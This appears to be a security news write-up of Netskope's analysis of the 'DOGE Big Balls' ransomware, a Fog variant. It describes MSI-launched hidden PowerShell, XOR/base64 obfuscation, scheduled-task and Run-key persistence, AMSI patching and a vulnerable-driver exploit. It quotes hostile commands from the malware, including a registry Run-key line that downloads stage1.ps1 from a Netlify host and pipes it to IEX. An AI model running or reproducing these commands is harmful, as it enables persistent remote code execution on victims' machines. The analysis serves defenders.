Cybersecurity researchers have identified a sophisticated new ransomware variant called “DOGE Big Balls,” which appears to be a modified version of the existing Fog ransomware family.

The malware, provocatively named after the Department of Government Efficiency (DOGE), employs a complex multi-stage infection chain utilizing both custom-developed PowerShell scripts and well-known open-source tools to compromise victim systems.

Throughout its payload files and ransom notes, the malware includes political statements, references to public figures, and links to YouTube videos, suggesting potential ideological motivations behind the attacks.

Initial infection vectors remain unconfirmed, though analysts suspect the distribution methods include phishing emails and exploitation of vulnerable exposed services.

Once executed, the ransomware deploys an intricate attack chain that progressively establishes persistence, performs credential theft, achieves lateral movement, and ultimately encrypts victim data.

The malware operators frequently update their tools and scripts hosted on Netlify, demonstrating an active development cycle and operational security awareness.

Netskope researchers identified the threat during routine hunting activities when they discovered a previously unreported payload connected to DOGE Big Balls ransomware.

Their analysis revealed an arsenal of new tools not documented in previous reports from other security vendors, including Trend Micro, Cyble, and the DFIR Report, who had previously tracked this threat actor.

The infection chain begins with an MSI installer file that executes an obfuscated PowerShell script. This initial script is encoded using a combination of XOR encryption with a single-byte key and base64 encoding, a pattern repeated throughout many of the malware’s components.

The payload.msi file’s CustomAction table contains an entry that executes a PowerShell command with bypassed execution policies: powershell -Execution Policy Bypass -WindowStyle Hidden -File wix.ps1.

The wix.ps1 script, once decoded, reveals code that checks for administrator privileges and creates persistence mechanisms by adding an LNK file named “EdgeAutoUpdater.lnk” to the Windows Startup directory.

The script also establishes a scheduled task named “EdgeAutoUpdater Task” that runs at midnight to ensure the malware’s stage1.ps1 script is downloaded and executed, even if the initial infection is interrupted.

Infection Mechanism Deep Dive

The stage1.ps1 script serves as the malware’s command and control center, orchestrating the download and execution of numerous additional components.

It first creates a hidden directory under the Windows Startup folder using attribute modification to conceal its presence. The script attempts to disable Windows Defender protections by executing commands like:-

$key = 97; $encoded = "QmFBYV [...redacted...) rYWth";
$xorBytes = [Convert]::FromBase64String($encoded);
$bytes = $xorBytes | ForEach-Object { $ -bxor $key };
$cmd = [System.Text.Encoding]::Unicode.GetString($bytes);
Invoke-Expression $cmd

This obfuscation technique allows the malware to evade string-based detection. The stage1.ps1 script also downloads and executes various tools with names like cwiper.exe, ktool.exe, sh.exe, and others.

Notably, the ktool.exe component exploits a vulnerable driver (CVE-2015-2291) via BYOVD (Bring Your Own Vulnerable Driver) technique to deploy a Havoc Demon payload for persistence and remote access.

The amsibypass.ps1 component specifically targets the Windows Antimalware Scan Interface by patching the “AmsiScanBuffer” function in memory, replacing its instructions with assembly code that forces it to return a clean result (0x80070057).

This sophisticated evasion technique allows subsequent malicious components to execute without being scanned by security solutions.

To establish persistence, registry modifications are made to the Run key with commands like:-

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v UpdaterService /t REG_SZ /d "powershell -windowstyle hidden ExecutionPolicy Bypass iwr -uri gentle-chebakia-da1172.netlify.app/stage1.ps1 | IEX" /f

According to Netskope’s latest report, the ransomware operators have enhanced their toolkit with additional components, including cryptocurrency mining software and advanced credential harvesting tools, demonstrating the threat actor’s evolving capabilities and financial motivations beyond traditional ransomware operations.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.